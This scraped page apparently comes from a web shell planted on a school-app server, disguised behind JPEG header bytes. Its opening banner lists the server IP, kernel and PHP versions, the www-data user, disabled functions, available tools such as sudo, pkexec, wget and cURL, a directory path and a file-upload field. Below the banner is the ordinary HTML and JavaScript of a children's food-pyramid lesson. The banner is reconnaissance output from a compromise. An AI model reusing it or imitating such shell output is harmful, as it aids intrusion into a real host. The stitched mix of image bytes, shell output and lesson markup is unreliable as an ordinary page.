????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.55 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old10/Html/LevelG/Category2/ |
Upload File : |
<!doctype html>
<html>
<head>
<title>Write two foods in each section</title>
<script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
<style>
.s_style_button_bottomLevel
{
text-align: center;
border-width:0px;
background-image: -webkit-linear-gradient(violet, orange); /* For Safari 5.1 to 6.0 */
background-image: -o-linear-gradient(violet, orange); /* For Opera 11.1 to 12.0 */
background-image: -moz-linear-gradient(violet, orange); /* For Firefox 3.6 to 15 */
background-image: linear-gradient(violet, orange); /* Standard syntax */
}
iframe
{
overflow: scroll;
width: 90%;
height: 90%;
border: 8px solid black;
}
textarea
{
position:absolute;
}
</style>
<script>
function page_preLoad()
{
s_setDeviceTypeLevelCategoryLastLesson(Level.G, Category.No2);
s_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
s_setHeaderTable('id_tblHeader', s_title_page, s_getSubTitle(Level.G, Category.No2, 34), true, true);
s_setFooterTable('id_tblFooter', true, true, false, true, true);
var ids_headings = ['id_td_heading1'];
var ids_textBoxes = new Array();
for (var textBoxId = 1; textBoxId <= 6; textBoxId++)
{
var idTextBox = 'id_textBox' + textBoxId;
var eTextBox = document.getElementById(idTextBox);
eTextBox.value = '';
if (s_currentDeviceType == s_DeviceTypeAndroidDeviceApp)
{
eTextBox.style.border = 'solid 2px black';
}
ids_textBoxes.push(idTextBox);
}
var ids_All = ids_headings.concat(ids_textBoxes);
s_adjust_fontSize_for_ids_all_devices(ids_All, 70);
var id_tables_array = ['id_table1'];
s_border_collapse_for_tables_for_all(id_tables_array);
}
function page_onLoad()
{
s_setHelpButtonsStyle('id_btnHelp');
setTextBoxesPosition();
}
function btnHome_click()
{
s_btnHomeCategories_click('LevelG');
}
function btnPrevious_click()
{
window.location = 'LevelGCat2Lesson33.html';
}
function btnNext_click()
{
window.location = 'LevelGCat2Lesson35.html';
}
function setTextBoxesPosition()
{
var eTd = document.getElementById('id_td_triangle');
var eTdRectangle = eTd.getBoundingClientRect();
var rectangleWidth = eTdRectangle.width;
var levelHeight = eTdRectangle.height / 6.0;
var positionX = eTdRectangle.left + (rectangleWidth / 2.0) - (rectangleWidth * 0.3);
var positionY = eTdRectangle.top + levelHeight + (levelHeight / 2.0);
var textBoxHeight = levelHeight * 0.3 + 'px';
positionY += (s_currentDeviceOS == s_deviceOS_Android) ? levelHeight * 0.2 : 0;
var txtBoxUpperLevel = document.getElementById('id_textBox1');
txtBoxUpperLevel.style.width = rectangleWidth * 0.6 + 'px';
txtBoxUpperLevel.style.height = textBoxHeight;
txtBoxUpperLevel.style.left = positionX + 'px';
txtBoxUpperLevel.style.top = positionY + 'px';
positionY += levelHeight;
positionY -= (s_currentDeviceOS == s_deviceOS_Android) ? levelHeight * 0.1 : 0;
var txtBoxUpperLevel = document.getElementById('id_textBox2');
txtBoxUpperLevel.style.width = rectangleWidth * 0.28 + 'px';
txtBoxUpperLevel.style.height = textBoxHeight;
txtBoxUpperLevel.style.left = positionX + 'px';
txtBoxUpperLevel.style.top = positionY + 'px';
var txtBoxUpperLevel = document.getElementById('id_textBox3');
txtBoxUpperLevel.style.width = rectangleWidth * 0.28 + 'px';
txtBoxUpperLevel.style.height = textBoxHeight;
txtBoxUpperLevel.style.left = positionX + (rectangleWidth * 0.32) + 'px';
txtBoxUpperLevel.style.top = positionY + 'px';
positionY += levelHeight;
positionY -= (s_currentDeviceOS == s_deviceOS_Android) ? levelHeight * 0.15 : 0;
var txtBoxUpperLevel = document.getElementById('id_textBox4');
txtBoxUpperLevel.style.width = rectangleWidth * 0.28 + 'px';
txtBoxUpperLevel.style.height = textBoxHeight;
txtBoxUpperLevel.style.left = positionX + 'px';
txtBoxUpperLevel.style.top = positionY + 'px';
var txtBoxUpperLevel = document.getElementById('id_textBox5');
txtBoxUpperLevel.style.width = rectangleWidth * 0.28 + 'px';
txtBoxUpperLevel.style.height = textBoxHeight;
txtBoxUpperLevel.style.left = positionX + (rectangleWidth * 0.32) + 'px';
txtBoxUpperLevel.style.top = positionY + 'px';
positionY += (s_currentDeviceOS == s_deviceOS_Android) ? levelHeight * 0.75 : levelHeight;
var txtBoxBottomLevel = document.getElementById('id_textBox6');
txtBoxBottomLevel.style.width = rectangleWidth * 0.6 + 'px';
txtBoxBottomLevel.style.height = textBoxHeight;
txtBoxBottomLevel.style.left = positionX + 'px';
txtBoxBottomLevel.style.top = positionY + 'px';
}
function page_onResize()
{
setTextBoxesPosition()
}
</script>
</head>
<body onload="page_onLoad()" onResize="page_onResize()">
<div id="s_id_div_message"></div>
<table id="id_tblMainiPadBody" border="1px" cellspacing="0" cellpadding="0">
<tr height="8%">
<td>
<div id="id_tblHeader"></div>
</td>
</tr>
<tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
<td>
<table width="100%" height="100%" border="0" cellpadding="2%" cellspacing="0">
<tr height="100%">
<td>
<table id="id_table1" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0">
<tr height="5%">
<td>
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td id="id_td_heading1" class="s_style_heading" width="*"><u>Write two foods in each section</u>:</td>
<td width="25%" align="right" style="padding-right:1%">
<input id="id_btnHelp" class="s_style_button_bottomLevel" type="button" value="Help" onclick="s_help_click('LevelGCat2Lesson34_images.html')">
</td>
</tr>
</table>
</td>
</tr>
<tr height="*">
<td id="id_td_triangle" align="center">
<img src="../../../img/LevelG/Category2/LevelGCat2Lesson34/blankPyramid.png" width="85%" alt="" draggable="false"/>
<textarea id="id_textBox1" class="s_style_droppable_dash" style="text-align:center; resize:none" rows="1">
</textarea>
<textarea id="id_textBox2" class="s_style_droppable_dash" style="text-align:center; resize:none" rows="1">
</textarea>
<textarea id="id_textBox3" class="s_style_droppable_dash" style="text-align:center; resize:none" rows="1">
</textarea>
<textarea id="id_textBox4" class="s_style_droppable_dash" style="text-align:center; resize:none" rows="1">
</textarea>
<textarea id="id_textBox5" class="s_style_droppable_dash" style="text-align:center; resize:none" rows="1">
</textarea>
<textarea id="id_textBox6" class="s_style_droppable_dash" style="text-align:center; resize:none" rows="1">
</textarea>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
<tr height="8%">
<td>
<div id="id_tblFooter"></div>
</td>
</tr>
</table>
<script>
page_preLoad();
</script>
</body>
</html>